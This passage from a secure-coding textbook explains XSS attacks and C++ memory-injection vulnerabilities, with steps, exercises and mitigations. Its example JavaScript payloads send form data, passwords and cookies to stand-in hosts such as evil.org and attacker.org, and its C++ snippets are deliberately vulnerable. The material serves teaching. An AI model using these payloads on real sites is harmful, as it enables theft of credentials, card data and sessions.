What will happen when this banner ad is rendered? It will manipulate the <form>
tag of the credit card submission form so the data is sent to evil.org rather than
to the intended recipient.
Tag manipulation occurs in the following way:
Step 1: Create the Payload. The malicious user starts by analyzing the HTML source of the target web
page. Here, he or she notices the opportunity to steal a user asset by changing
the tag structure. This can be done with the following JavaScript:
document.getElementById('forms').action="evil.org/processRequest.php";
Step 2: Insert Payload Onto Host. The trick is to place this JavaScript in a web page. Clearly such code
is against the policy of the owner of the web page! However, with some
investigation, the attacker realizes that code from the ad server is not sanitized.
Thus by submitting the ad shown above, the attacker is able to insert the payload
onto the unsuspecting host.
Step 3: Victim Views the Page. Next the victim visits the web site and attempts to make a purchase.
The victim ignores the ad at the bottom of the page, not realizing that the ad
actually changed the tag structure of the web form and changed the destination
of the credit card data.
Step 4: Exploitation. When the victim hits [Submit] on the web form, the credit card data is sent
to evil.org. Not only does the purchase not go through as intended, but many
unexpected charges appear on his or her statement at the end of the month!
Preventing attacks such as this is difficult. It is not practical to totally ban all
scripting on an e-commerce web site. Thus the best option is to carefully sanitize
user input. In this case, the ad server should be performing the sanitization with
a white-list enumerating the type of tags and data allowable for a URL.
DOM Reading
It is commonly the case that a given web page displays confidential user
information, including but not limited to user names and passwords, credit
card numbers, and Personally Identifiable Information (PII). For example, consider a
social networking site such as stackOverflow.com. Here, an essential part of the
business model is to host user content. While you can freely view content, you
must enter your username and password if you wish to add content of your own.
To make this convenient, the Log In code is hosted on the same page as the
content. An attacker would like to retrieve the credentials of unsuspecting users.
He notices that the login code is the following:
<form id="login-form" method="POST">
<label for="email">Email</label><br/>
<input type="email" name="email" id="email" /><br/>
<label for="password">Password</label><br/>
<input type="password" name="password" id="password"><br/>
</form>
It would be wonderful, from the attacker's perspective, if he could read this data
and send it to his server. How does he do this? Through DOM reading:
Step 1: Create the Payload. The following code would do the trick:
var eMail = document.getElementById('email').value;
var payload = eMail.concat(".", document.getElementById('password').value);
Now we want to send this data to evil.org. This can be done by issuing a request
for data on the server. Specifically, we will ask for the image
"evil.org/payload/username.password.jpg". When the server sees a request for
a JPG from the payload directory, it will save the filename and later break out the
username and password components. The following code will send the payload:
document.write('<img src="http://evil.org/payload/' + payload + '.jpg"/>');
Step 2: Insert Payload. The JavaScript needs to be put in a web page. Here the attacker responds to
a post and inserts the above code. The host then stores the data in the database.
Step 3: Victim Views the Page. Next the victim visits the web site. She reads the posts and wishes to
make one herself. She clicks on the login button and types her credentials.
Unbeknownst to her, a copy of her data is made and sent to evil.org.
Step 4: Exploitation. The attacker receives the victim's credentials and is able to impersonate her
on the site.
Cookie Theft
A cookie is a string that the browser stores on a web site's behalf to help maintain
session state. Cookies were invented in 1994 by the Netscape Corporation and
rolled out in version 0.9 beta of the Mosaic Netscape browser. Cookies are only
accessible by the web site that generated them; no web site has access to another
site's cookie. A given web site can keep any textual data in a cookie that it
chooses. The browser does not interpret the data; it only stores it and passes it
back to the server. For example, a web site may keep a reference counter to keep
track of how many times a given user has visited. Every time the web site receives
the cookie, it sets the next value to one greater.
Today cookies are commonly used to store session data. Once a user is
authenticated, then a large random number is stored in the cookie. With the next
web page request, the random number is sent back to the web site so it can
associate the web request with the previous authentication results. Cookie theft
occurs when an attacker is able to obtain a cookie from a victim and then
impersonate him or her.
It is possible to access a document’s cookie in JavaScript with the following code:
document.cookie
This enables the web site to include client-side processing that provides a richer
session-layer experience.
Benjamin Mussler discovered an XSS vulnerability in Amazon's Kindle Library
web site with the potential to completely compromise a victim's Amazon
account. The vulnerability was not permanently closed until after Mussler
disclosed it publicly in September 2014. An attack would go something like this:
Step 1: Create the Payload. The malicious user starts by creating a Kindle book with the following
title:
Book <script>document.write(
"<img src='http://attacker.org/a.gif?x="+document.cookie+"'>"
)</script> Title
Cookie theft such as this Amazon example represents one of the most common
and severe XSS attacks on the web today.
AJAX Manipulation
In 2005, a 19-year-old named “Samy” made himself the most popular person on
MySpace by creating an XSS worm. The worm propagated with some script that
added the text “Samy is my hero” to the bottom of the profile of anyone who
viewed an infected page. He had 200 friends in the first 8 hours. He had 2,000
friends a few hours later. Shortly after that, he had 200,000 friends. By the end of
the first day the number crossed a million. His comment was very interesting:
I wasn't sure what to do but to enjoy whatever freedom I had left, so I went to
Chipotle and ordered myself a burrito. I went home and it had hit 1,000,000.
(Lai, Computerworld, 2005)
Samy was able to launch this attack in the following way:
Step 1: Create the Payload. MySpace performed white-list filtering of user content to allow only <a>,
<div>, <embed>, and <img> tags. However, CSS was not filtered, so script could
be added that way:
<div expr="alert('XSS')"></div>
MySpace was clearly aware of reflected injection attacks and went to great
pains to prevent them. However, because the content of tag attributes was
filtered with a black list (weak mitigation) rather than a white list (strong
mitigation), most of the safeguards could be side-stepped.
Examples
1. Q: Classify the following as direct or reflected script injection: opening a web page
causes a script to run which will erase your hard drive.
A: Direct, because only two parties are involved: the attacker and the victim.
A: Reflected, because the 3rd party review was able to place JavaScript into the page
which stole the user's cookie. This enabled the attacker to log in as the user and
manipulate the shopping cart. Notice that there are three parties involved: 1)
the attacker who wrote the review and provided the JavaScript, 2) the bystander
(Amazon) who hosted the attacker's script, and 3) the victim who viewed a page
built from the attacker's code and the bystander's code.
A: Direct, because only two parties are involved: the attacker and the victim.
4. Q: List, describe, and cite four client-side scripting languages used on the web.
Exercises
1 Recite by memory the three conditions that must be met for a Direct Script
Injection attack to be successful.
2 Recite by memory the four conditions/steps that must be met for a Reflected
Script Injection attack to be successful.
3 Is your favorite content management system immune to XSS attacks? How
would you find out?
4 Why is it more dangerous to execute script on someone else’s web site than on
the attacker’s own web site?
5 What does the following code do that was found embedded in an Amazon
review?
<img src="http://trusted.org/account.asp?ak=<script>
document.location
.replace('http://evil.org/steal.cgi?'+document.cookie);</script>">
Problems
1 What happens when the following URL is opened?
http://portal.example/index.php?sessionid=12312312&
username=%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65
%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70
%3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65
%78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F
%6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64
%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73
%63%72%69%70%74%3E
3 If you were to re-write the HTML standard from scratch, how would you design
scripting to make it powerful and secure?
4 Find an article describing a real script injection attack. This could be a news
story, a technical explanation, or a description of the cleanup that resulted.
5 Describe whether code may or may not be embedded in a given file format. If
code may be embedded, describe how much power that scripting language has.
- DOCX: Can the Office 2007 files (.docx, .xlsx, .pptx) contain macros? Cite
your answer.
- DOC: Can the old Office 97 files (.doc, .xls, .ppt) contain macros? Cite your
answer.
- PDF: Can a PDF file contain a macro? Cite your answer.
- Flash: Can an Adobe (formerly Macromedia) Flash file contain a macro?
- MP3: Can an MP3 sound file contain a macro? Cite your answer.
6 The text describes several forms of XSS attacks: tag manipulation, DOM reading,
cookie theft, and AJAX manipulation. Find an article describing another form of
XSS.
Chapter 07: Memory Injection
The vast majority of all malware spreads by exploiting memory injection vulnerabilities. In the early days of
software development, it was common for software engineers to be ignorant of these vulnerabilities and
accept that they inevitably exist in the code. Those days are past. Now it is not uncommon for someone to
lose their job because they introduced a memory injection vulnerability. Therefore, every software
engineer has to be very good at identifying and fixing these vulnerabilities.
Memory injection arises when an attacker is able to alter the intended flow of a
program through carefully crafted input.

Every computer designed and built before the 1940s was designed to accomplish
a single specific task (such as computing tide tables or calculating ballistic
trajectories). It was not possible to reconfigure a computer to perform a different
task without a change to the computer's hardware. John von Neumann changed
this with the introduction of the stored-program computer. Now programs are
stored in the computer's memory, not embedded in the hardware logic of the
computer itself.

One vulnerability inherent in all von Neumann computers is that it is impossible
to tell whether a given location in memory is storing an instruction or program
data. Similarly, any location in memory can be interpreted by the CPU as an
instruction by setting the instruction pointer (IP) to that address. Thus if an
attacker is able to direct the flow of a program from the intended course to a
location of memory containing malicious instructions, the integrity of the
program can be compromised.
Memory injection attacks occur when an attacker is able to alter the intended
flow of a program through carefully crafted input. This can happen a variety of
ways, but the most common is to put machine language instructions into an input
buffer and then trick the program into considering the buffer as part of the
program.
Public enemy #1, the stack buffer overrun, is one such memory injection
vulnerability. This attack vector occurs when assembly code is inserted into an
outwardly facing buffer such as a string input field. If the user is able to provide
more data to the string than the buffer is designed to hold, then the return
address (residing after the buffer on the stack) can be overwritten. In this case,
when the function returns, the IP is set to the attacker's malicious code and the
program is compromised.
The most common types of memory injection attacks include array indexing,
pointer subterfuge, arc injection, V-Table smashing, stack smashing, heap
smashing, integer overflow, ANSI-Unicode mismatch, and VAR-args (Pincus &
Baker, 2004).
Array Index
Arrays provide arbitrary access to the elements of data in memory. If the index
specified is at or beyond the size of the buffer, a buffer overflow occurs. The
same happens if the index specified is below the first index. Arrays are frequently
stored on the stack, so if there is a buffer overflow, then it is possible to access
the stack. This access can lead to stack frame pointer tampering or modification
of other local variables.
For an array index vulnerability to exist in the code, the following must be
present:
Vulnerability:
1. There must be an array and an array index variable.
2. The array index variable must be reachable through external input.
3. There must not be bounds checking on the array index variable.
Example:
{
   int array[4];
   bool authenticated = false;  // the asset
   int index;
   cin >> index;
   array[index] = -1;           // if index == 5, problem!
}
Mitigation: The best way to prevent array index bugs is to make sure that the buffer size of
the array is always passed with the array so the callee can check the bounds of
the array with the correct value before any array access. This can be
accomplished by encapsulating the array in a class.
Note that most modern languages such as Python and Ruby throw an exception
if an invalid index is utilized.
Array index vulnerabilities are possible because arrays are, by definition, a
contiguous block of data on the stack, heap, or code segment of memory.
Because of the way that the compiler treats the array [] operator (please see
Appendix A: Arrays for details as to how this works), an array index is actually an
offset to the location in memory where the array resides.
Consider the vulnerable code previously mentioned:
{
int array[4];
bool authenticated = false; // the asset
int index;
cin >> index;
array[index] = -1; // if index == 5, problem!
}
Figure: when the user inputs 5, the assignment array[index] = -1 writes the four
bytes ff ff ff ff one element past the end of the array, overwriting the adjacent
variable on the stack.
Pointer Subterfuge
Pointer subterfuge is the process of overwriting a pointer so the pointer refers to
different data than the code author intended. Since pointers are commonly used
in many programs, this becomes a difficult vulnerability to counter.
For a pointer subterfuge vulnerability to exist in the code, the following must be
present:
Vulnerability:
1. There must be a pointer used in the code.
2. Through some vulnerability, there must be a way for user input to
overwrite the pointer. This typically happens through a stack buffer
vulnerability.
3. After the pointer is overwritten, the pointer must be dereferenced.
{
long buffer[2];
char * p = "Safe";
Only languages that use “dumb pointers” such as C and C++ have the potential to
have pointer subterfuge vulnerabilities.
To illustrate how this works, consider the following code:
{
long buffer[1];
char * p1 = "Safe";
char * p2 = "Rosebud"; // the top secret password
Here there are two pieces of data in the system: some safe data (corresponding
to the “safe” string) and some highly confidential data:
The string "Safe" resides in the code segment at address 0x00400c60, and
"Rosebud" resides at 0x00400c72. On the stack, buffer[0] is followed by p1
(holding 0x00400c60) and p2 (holding 0x00400c72).
Figure 07.3: Memory organization before a pointer subterfuge attack
Now in this case, the buffer variable is an array (with just one element) that
resides on the stack. The two c-strings, on the other hand, do not! They actually
reside in the code segment of memory. Thus “Safe” exists in the code and the
pointer to "Safe" (p1 in this case) resides on the stack. The same is true for the
top-secret password "Rosebud."
In this case the string “Safe” resides in location 0x00400c60 and “Rosebud”
resides in location 0x00400c72. The user somehow is aware of these locations
and inputs the value 4197490 (because 4197490 base 10 is the same as
0x00400c72 in hexadecimal). Thus the layout of memory will change:
[Figure: memory organization after the attack — the overrun write into buffer[1] (the slot where p1 resides) leaves p1 holding 0x00400c72, so both p1 and p2 now point at "Rosebud"]
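The overwrite can be simulated deterministically. In this sketch (not the book's listing; memcpy stands in for the buffer overrun so the behavior is well defined), attacker-chosen bytes replace the value of p1:

```cpp
#include <cstring>

// simulate pointer subterfuge: overwrite the data pointer p1 with the
// bytes of another address, exactly what the overrun write accomplishes
const char * subterfuge()
{
   const char * p1 = "Safe";
   const char * p2 = "Rosebud";        // the top secret password
   std::memcpy(&p1, &p2, sizeof p1);   // attacker-controlled write over p1
   return p1;                          // now refers to "Rosebud"
}
```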
ARC Injection
ARC injection is similar to pointer subterfuge except a function pointer is
overwritten instead of a data pointer. This is the process of overwriting a function
pointer so, when it is dereferenced, a different function from the intended one
gets executed. The potential for this vulnerability exists whenever function
pointers are used in the code.
For an ARC Injection vulnerability to exist in the code, the following must be
present:
1. There must be a function pointer used in the code.
Vulnerability 2. Through some vulnerability, there must be a way for user input to
overwrite the function pointer. This typically happens through a stack
buffer vulnerability.
3. After the memory is overwritten, the function pointer must be
dereferenced.
{
   long buffer[4];
   void (* pointerFunction)() = safe;
   cin >> buffer[4];     // overrun: writes over pointerFunction
   pointerFunction();    // dereference the overwritten function pointer
}
Exploitation 2. The attacker must have the address to another function which is to be
used to replace the existing function pointer.
Thus it is necessary for the address of a function providing useful functionality to
be known by the attacker. This can be an existing function already present in the
compiled code or it could be the address to machine language code provided by
the attacker in a compromised buffer.
This will work much like pointer subterfuge except we are overwriting a function
pointer instead of a data pointer. For a review of how function pointers work,
please see Appendix B: Function Pointers. Back to our example code:
{
   long buffer[1];
   void (* pointerFunction)() = safe;
   cin >> buffer[1];     // overrun: buffer[1] is where pointerFunction resides
   pointerFunction();    // calls whatever address the attacker provided
}
[Figure 07.5: Memory organization before an ARC injection attack — buffer[0] on the stack sits next to pointerFunction, which holds 0x004016d6, the address of safe()]
Notice that all the functions in the program reside in the code segment and
therefore have an address. Here pointerFunction points to a safe function.
Unfortunately, the attacker happens to know the address of dangerous(). He
provides 4202714 (corresponding to the hexadecimal value 0x4020da). The result
is the following:
[Figure 07.6: Memory organization after an ARC injection attack — the overrun write into buffer[1] (the slot where pointerFunction resides) leaves it holding 0x004020da. Code segment addresses: main: 0x40094d, safe: 0x4016d6, function1: 0x401820, dangerous: 0x4020da, function2: 0x4020ff]
Often the attacker cannot provide a valid function pointer so ARC injection is not
possible. Instead, the attacker can provide bogus data resulting in a crash when
the pointer is dereferenced. This becomes ARC spraying, a denial attack. Another
possible attack vector involves the user providing machine instructions into some
input buffer. The attacker would then put the address of these instructions in the
function pointer. When the function pointer is dereferenced, the provided
machine instructions are then executed.
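The attack can be simulated deterministically (a sketch, not the book's listing; memcpy stands in for the buffer overrun so the behavior is well defined):

```cpp
#include <cstdio>
#include <cstring>

void safe()      { std::puts("safe"); }
void dangerous() { std::puts("dangerous"); }

// simulate ARC injection: the attacker's bytes are copied over the
// function pointer; dereferencing it then runs dangerous()
void (*arcInjection())()
{
   void (* pointerFunction)() = safe;       // the intended target
   void (* attackerValue)()   = dangerous;  // e.g. 0x4020da in the text
   std::memcpy(&pointerFunction, &attackerValue, sizeof pointerFunction);
   return pointerFunction;
}
```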
V-Table Smashing
V-Table smashing is a special case of ARC injection. This occurs because virtual
functions in most object oriented languages are implemented using a data
structure called a Virtual Method Table (or V-Table for short). V-Tables are
essentially structures of function pointers. Thus, if the attacker is able to modify
the V-Table of an object, then it becomes possible to substitute the valid function
pointer with another malicious function pointer (rix, 2000).
For a V-Table smashing vulnerability to exist in the code, the following must be
present:
1. The vulnerable class must be polymorphic.
2. The class must have a buffer as a member variable.
Vulnerability
3. Through some vulnerability, there must be a way for user input to
overwrite parts of the V-Table.
4. After a virtual function pointer is overwritten, the virtual function must
be called.
class Vulnerable
{
public:
Example virtual void safe(); // polymorphic function
private:
long buffer[2]; // an array in the class that has
}; // a buffer overrun vulnerability
V-Table smashing is just a special form of ARC injection. The only difference is that
the function pointer is in a V-Table rather than being a normal stand-alone
variable. To review how V-Tables work, please see Appendix C: V-Tables. Back to
our vulnerable code:
class Vulnerable
{
public:
virtual void safe(); // polymorphic function
virtual void dangerous();
private:
long buffer[1]; // an array in the class that has
// a buffer overrun vulnerability
};
When we instantiate an object of type Vulnerable (who would ever do that? You
are just asking for trouble!), the layout in memory looks something like this:
[Figure: memory organization of a Vulnerable object — buffer sits next to the hidden __vtable pointer; the v-table holds the addresses of safe (0x40094d) and dangerous (0x4016d6)]
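The hidden v-table pointer shown above can be observed indirectly with sizeof. A sketch (the class names are illustrative, not from the text):

```cpp
// identical data members, but the polymorphic class carries a hidden
// v-table pointer, so it is larger by at least one pointer
class Plain
{
   long buffer[1];
};

class Vulnerable
{
public:
   virtual void safe() {}   // polymorphic function
private:
   long buffer[1];          // the overrunnable member buffer
};
```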
Stack Smashing
Stack smashing is a term referring to the exploitation of a stack buffer overrun
vulnerability (One, Smashing the Stack for Fun and Profit, 1996). Many consider
this class of vulnerabilities to be the most important because it has often been
exploited by virus writers in the past. The first example of malware leveraging
stack smashing was the Morris Worm of 1988.
For a stack smashing vulnerability to exist in the code, the following must be
present:
1. There must be a buffer (such as an array) on the stack.
2. The buffer must be reachable from an external input.
Vulnerability
3. The mechanism to fill the buffer from the external input must not
correctly check for the buffer size.
4. The buffer must be overrun (extend beyond the intended limits of the
array).
{
char text[256]; // stack variable
Example cin >> text; // no validation on buffer size
}
The most common mitigation for stack smashing attacks is to simply check buffer
Mitigation sizes on all buffer references. Some modern languages do this by default.
Compilers also add address randomization and canaries to complicate exploits.
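In C++, one way to "check buffer sizes on all buffer references" is std::setw, which caps the extraction. A sketch (boundedRead is a hypothetical helper; it takes the stream as a parameter, an adjustment so the sketch is self-contained):

```cpp
#include <iomanip>
#include <istream>
#include <string>

// setw(sizeof text) limits the extraction to 7 characters plus the
// terminating '\0', closing the overrun in the example above
std::string boundedRead(std::istream & in)
{
   char text[8];
   in >> std::setw(sizeof text) >> text;
   return std::string(text);
}
```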
To understand how stack smashing works, it is first necessary to have a detailed
understanding of how your particular compiler on your particular system treats
the stack. Please see Appendix E: The Callstack for a review of this.
Stack smashing works when the attacker is able to provide a new return pointer
in the place of the pointer provided by the compiler. Since this return pointer is
just a special form of a function pointer, stack smashing is a special case of ARC
injection. The problem is that this function pointer exists at the end of every single
function in the call stack! Consider the following code:
void prompt()
{
char text[8]; // stack variable
cin >> text; // no validation on buffer size
}
Note that prompt() was called by a function called caller(). Just before we
execute the cin statement, the state of the stack is the following:
[Figure: the call stack just before the cin statement — caller's frame (frame pointer and return address 0xdf48321450012315) sits above prompt's frame with its empty text buffer; the attacker's target is the return address slot, to be replaced with the address of dangerous(), 0xdf48321ea74021da]
The input needs to be the following to set the return address to the dangerous()
function. Note how the address to dangerous() is embedded in the input buffer:
41 41 41 41 41 41 41 41 df 48 32 1e a7 40 21 da
Let’s say the stack address currently starts at location 0x7fffff2397800150 and
the return address is at location 0x7fffff2397800154.
Heap Smashing
Heap smashing is the process of overwriting a buffer on the heap whose
boundaries are not appropriately checked (Kaempf). This may eventually result in
arbitrary code insertion. More commonly, the attacker would alter program flow
or its data.
For a heap smashing vulnerability to exist in the code, the following must be
present:
1. There must be two adjacent heap buffers.
2. The first buffer must be reachable through external input.
Vulnerability 3. The mechanism to fill the buffer from the external input must not
correctly check for the buffer size.
4. The second buffer must be released before the first.
5. The first buffer must be overrun (extend beyond the intended limits of
the array).
{
   char * buffer1 = new char[4]; // requires two buffers on the heap
   char * buffer2 = new char[4];
   cin >> buffer1;               // overrun buffer1 into buffer2's MCB
   delete [] buffer2;            // the second buffer is released first
   delete [] buffer1;
}
On the surface, this appears to be quite similar to stack smashing. However, the
attack vector is quite a bit more complex: the attacker cannot directly inject
code to be executed; rather, a block of data in memory is altered. To
understand how this works, it is necessary to have a deep understanding of how
heaps are maintained and how the memory manager works. For a review on this,
please see Appendix F: The Heap.
To demonstrate how this works, consider two buffers that are allocated next to
each other in memory:
{
char * buffer1 = new char[4]; // requires two buffers on the heap
char * buffer2 = new char[4];
assert(buffer1 < buffer2); // buffer 1 must be before buffer 2!
…
If the two blocks are in memory next to each other, then the layout of memory
would probably be something like this:
[Figure 07.15: Memory organization before a memory free occurs — each chunk on the heap, free or used, is preceded by its MCB; buffer1 and buffer2 occupy adjacent chunks]
Every chunk of memory, both free and utilized, has an associated Memory Control
Block (MCB). This MCB is essentially a linked list with two member variables: the
current chunk size (size) and the previous chunk size (prevSize). In our above
example, we have two buffers (buffer1 and buffer2) somewhere on the heap.
Recall that buffer2 must be immediately after buffer1 for heap smashing to
work. Normally to free a chunk, I would just modify the pointers in the MCBs:
[Figure: memory organization after the free — the MCBs are relinked so the freed chunk and the adjacent free chunk become one]
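The MCB described above might be sketched as a struct; the field names (size, prevSize) follow the text, while real allocators use different layouts:

```cpp
// each heap chunk is preceded by one of these; the free routines walk
// and rewrite these fields, which is what heap smashing corrupts
struct MCB
{
   long size;       // size of the current chunk
   long prevSize;   // size of the previous chunk
};
```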
Memory management routines are specified from the context of the chunk being
freed. Therefore the pointer notation gets a bit tricky. Here the variable mcb refers
to the MCB of buffer2 (the one being deleted):
mcbNext = mcb + mcb->size; // the MCB of free
mcbNextNext = mcbNext + mcbNext->size; // the MCB after free
mcb->size += mcbNext->size;
mcbNextNext->prevSize += mcb->size;
As the attack progresses, the attacker will overrun buffer1, and, in the process,
place a new MCB in the slot in memory immediately before buffer2.
…
cin >> buffer1;
…
[Figure 07.17: Memory organization after heap smashing has occurred — the overrun of buffer1 has planted an attacker-controlled MCB immediately before buffer2]
With this buffer overrun, the pointers in the overwritten MCB are unreliable; the
attacker can put any data in there he or she chooses.
The next stage of the attack is to free the second buffer:
…
delete [] buffer2;
…
Now when we free buffer2, the memory manager will try to grow the free
chunk after buffer2 so the two become one large chunk. To do this, it must
update the MCB at the end of the free space as well as the MCB of buffer2. There
is just one problem: the MCB of buffer2 was compromised by the buffer overrun
of buffer1, so the chunk-combining code will run on attacker-controlled values.
The code for that is the following:
mcbNext = mcb + mcb->size; // the MCB of free
mcbNextNext = mcbNext + mcbNext->size; // the MCB after free
mcb->size += mcbNext->size;
mcbNextNext->prevSize += mcb->size;
Integer Overflow
Integer overflow (and the closely related integer underflow) occurs when data
from a larger data-type is assigned to that of a smaller data-type or when the
result of an expression exceeds the limitations of a variable
(char value = 100 * 4;). An attacker can exploit an integer overflow bug if
code validating a buffer check does not take overflow into account (Ahmad,
2003).
For an integer overflow vulnerability to exist in the code, the following must be
present:
1. There must be a security check represented by an expression.
Vulnerability
2. The expression must have the potential for overflow.
3. At least one of the numbers used to compute the sentinel must be
reachable through external input.
{
   int buffer[256];
   int * sentinel = buffer + 256; // the end of the buffer
   int offset;
Example cin >> offset; // 0 <= offset <= 255
   if (buffer + offset < sentinel) // this comparison can itself overflow
      buffer[offset] = -1;
}
There are many ways to prevent this class of vulnerabilities (see below). Perhaps
the simplest is to be exceedingly careful when performing arithmetic with
Mitigation numbers provided by external input. Another is to explicitly detect overflow
cases. This is especially critical when casting data from one type to another. See
the article cited below for more details on how to accomplish this.
Some languages, such as Python, move to Big Numbers (arrays of digits) and thus
are not susceptible to integer overflow bugs.
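Explicitly detecting overflow before it happens might look like this (addWouldOverflow is a hypothetical helper, not from the text):

```cpp
#include <climits>

// test against the limits of int before performing the addition, so
// the check itself cannot overflow
bool addWouldOverflow(int a, int b)
{
   if (b > 0)
      return a > INT_MAX - b;   // a + b would exceed INT_MAX
   return a < INT_MIN - b;      // a + b would fall below INT_MIN
}
```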
To understand how integer overflow works, it is first necessary to understand
how integers are stored on digital computers. For a review of this, please see
Appendix D: Integers.
Every data type can hold a finite amount of data. For example, an unsigned
character (unsigned char letter;) can only hold values between 0 and 255.
What happens when a value greater than the maximum value (or less than the
minimum value) is assigned to a given variable? The answer is that the overflow
condition is met: the value wraps around, so the variable receives the original
value modulo the range of the type.
{
// example of overflowing a small number
int largeNumber = 732;
unsigned char smallNumber = 732; // not 732 but 220!
assert(smallNumber == largeNumber % 256); // true: 732 % 256 == 220
}
int offset;
cin >> offset; // 0 <= offset <= 255
How can we protect this buffer so we can avoid an array index vulnerability?
Consider the following function:
inline bool isIndexValid(void * pBegin, void * pEnd, int offset)
{
   // make sure the pointers are even set up correctly
   assert(pBegin < pEnd);
   void * pCandidate = (char *)pBegin + offset;      // pointer arithmetic first
   return pBegin <= pCandidate && pCandidate < pEnd; // then the check
}
Notice how this code carefully validates the address after we perform the pointer
arithmetic. This ensures that any overflow has happened before we perform the
security check.
{
   int buffer[256];
   int offset;
   cin >> offset;
   if (isIndexValid(buffer, buffer + 256, offset * (int)sizeof(int)))
      buffer[offset] = -1;
}
ANSI-Unicode Conversion
An interesting vulnerability exists when Unicode → ANSI transformations are
made. Many programmers who work with ASCII (or ANSI) text are used to the size
of the buffer in bytes being the same as the number of characters:
const int n = 32;
char buff[n]; // traditional c-string
assert(sizeof(buff) == n); // this assertion is true
This is not true when working with Unicode text where each glyph is stored in the
integer type short:
const int n = 32;
short buff[n]; // Unicode string
assert(sizeof(buff) == n); // this assertion is not true!
{
short unicodeText1[256];
short unicodeText2[256];
inputUnicodeText(unicodeText1, 256);
Example
copyUnicodeText(unicodeText1 /* source buffer */,
unicodeText2 /* destination buffer */,
sizeof(unicodeText2) /* Should be 256 not 512! */);
}
To properly deal with non-character buffer sizes, it is important to make a
distinction between the size of the buffer and the number of elements in the
buffer. The size of the buffer is the number of bytes in the allocated memory. The
number of elements, on the other hand, may be less than the size if the element
size is greater than one.
{
   int data[100];
   cout << "Size of the buffer: " << sizeof(data) << endl;                  // 400 bytes
   cout << "Number of elements: " << sizeof(data) / sizeof(data[0]) << endl; // 100
}
The correct way to get the size of a Unicode (or any other array for that matter)
is:
sizeof(buff) / sizeof(buff[0])
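The formula can be wrapped in a small helper so the compiler supplies both sizes (numElements is a hypothetical name, not from the text):

```cpp
// sizeof(buff) is the size in bytes; dividing by the element size
// yields the element count, for short, int, or any other type
template <typename T, int N>
int numElements(T (&buff)[N])
{
   return sizeof(buff) / sizeof(buff[0]);
}
```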
There are many incarnations of this bug. Most occur when explicit or implicit
casting occurs as data is converted between data-types. This can happen from
short → char, int → short, double → float, and many more. In each case,
the developer must be very careful that the buffer size and the number of
elements are fully considered.
VAR-ARG
VAR-ARG injection attacks are also known as “string format” attacks (Bartik,
Bassiri, & Lindiakos). These occur when commands or instructions are embedded
in string data-structures. A classic example of this type of function in C is the
printf function. When functioning normally, the printf function is passed as
many parameters as there are formatting tokens in the string. However, an
attacker could pass malicious input into the function and cause it to move onto
areas of the stack where it shouldn't operate. For example, the %s formatting
token is used to signal the printf function to output a string. If the attacker
simply gives the printf function the parameter of %s, but no string value, then
the printf function would begin to read from the stack until it found a null value,
or the program would read outside of its allowed memory. An attacker can use
the printf function to find out where the stack is located or to determine the
values stored on it.
For a VAR-ARG vulnerability to exist in the code, the following must be present:
1. There must be a VAR-ARG style function.
Vulnerability 2. The number of arguments must be specified through one of the first
parameters in the list.
3. Through some external input, the user must be able to specify a different
number of parameters than the program is designed to accept.
{
char text[256];
Example cin >> text;
printf(text); // what if text=="%s%s"?
}
Exploitation of VAR-ARG attacks depends on the specifics of how the VAR-ARG
mechanism is implemented. One common outcome is an application crash
Exploitation
yielding a denial attack when the user-provided formatting string contains
formatting tokens such as "%s."
Avoid using VAR-ARGs; they have been deprecated. Streams are used in C++ for
Mitigation a similar purpose. Languages such as Python and Swift use tuples for similar
purposes but are not susceptible to VAR-ARG vulnerabilities.
The reason why this works is because functions like printf use the VAR-ARG
mechanism to allow for a variable number of parameters. This is accomplished at
run-time, as opposed to traditional functions which specify the number of
parameters they expect at compile-time:
#include <stdarg.h>
int sum(int n, ...)   // n promises how many arguments follow
{
   va_list ap;
   va_start(ap, n);
   int sum = 0;
   for (int i = 0; i < n; i++)
      sum += va_arg(ap, int);
   va_end(ap);
   return sum;
}
This function is designed to work in the following way: the number of parameters
passed should line up with the n variable:
int value = sum(4 /* n */, 10, 20, 30, 40);
What would happen when we tell the function we are passing five parameters
but we are in fact only passing two?
int value = sum(5 /* n */, 10, 20); // where are the three other parameters?
This will require the VAR-ARG code to continue looking for parameters even when
they do not exist. In other words, it will result in a buffer overrun!
Examples
1. Q Name the vulnerability associated with the following code:
void fillText(char text[], int size)
{
for (unsigned char i = 0; i < size; i++)
cin >> text[i];
}
A Integer Overflow. Notice that i is an unsigned char with a maximum size of 255
and that size is an int with a maximum size of 2 billion. If the function
fillText() is called with the second parameter greater than 255, then the loop
will continue forever. This will amount to a denial attack. This meets all the
requirements for an Integer Overflow attack:
• There must be a security check represented by an expression. That
expression is i < size.
• The expression must have the potential for overflow. This is the case
because one is an unsigned char while the other is an int.
• At least one of the numbers used to compute the sentinel must be reachable
through external input. If the function fillText() is called where the value
of size comes from external input, then the possibility for an attack exists.
3. Q Is it possible to write a C++ compiler that is immune to V-Table Smashing
vulnerabilities?
A Yes. It is only necessary to make sure one of the requirements cannot be met.
These requirements are:
• The vulnerable class must be polymorphic. Since C++ compilers must
support polymorphism, this cannot be changed.
• The class must have a buffer as a member variable. Since C++ classes must
support arrays as member variables, this cannot be changed.
• Through some vulnerability, there must be a way for user input to overwrite
parts of the V-Table. It is not possible to prevent buffer overruns in C++
without changing the language. However, it is possible to put the V-Table
pointer in a location where buffer overruns cannot overwrite it. For
example, imagine a class implementation where every object consists of two
pointers: one to the member variables and one to the V-Table. If the
compiler is careful to put these two parts in different locations in memory,
then it will be impossible for a buffer overrun in a member variable to alter
the V-Table. Notice how this can be accomplished without altering the C++
language.
• After a virtual function pointer is overwritten, the virtual function must be
called. This cannot be changed without altering the C++ language.
A We need to pass the buffer size of the destination buffer. Note that we have no
way to verify that the buffer size variable is correct!
void strncpy(char * dest, const char * src, int size)
{
while (--size > 0 && (*(dest++) = *(src++)))
;
}
5. Q Write a C++ program to exhibit the pointer subterfuge vulnerability. This
includes two functions:
x Vulnerability: A function that exhibits the vulnerability.
x Attacker: A function that calls the vulnerable function and exploits it. In
other words, we will not be accepting user input here. Instead we will pass
a value or a buffer to Vulnerability() which will cause the vulnerability
to be made manifest.
Notice how, if the size parameter was less than 2, the program would display
“Safe” on the screen. However, our attacker function does not do this:
void subterfugeExploit()
{
// an attacker’s array
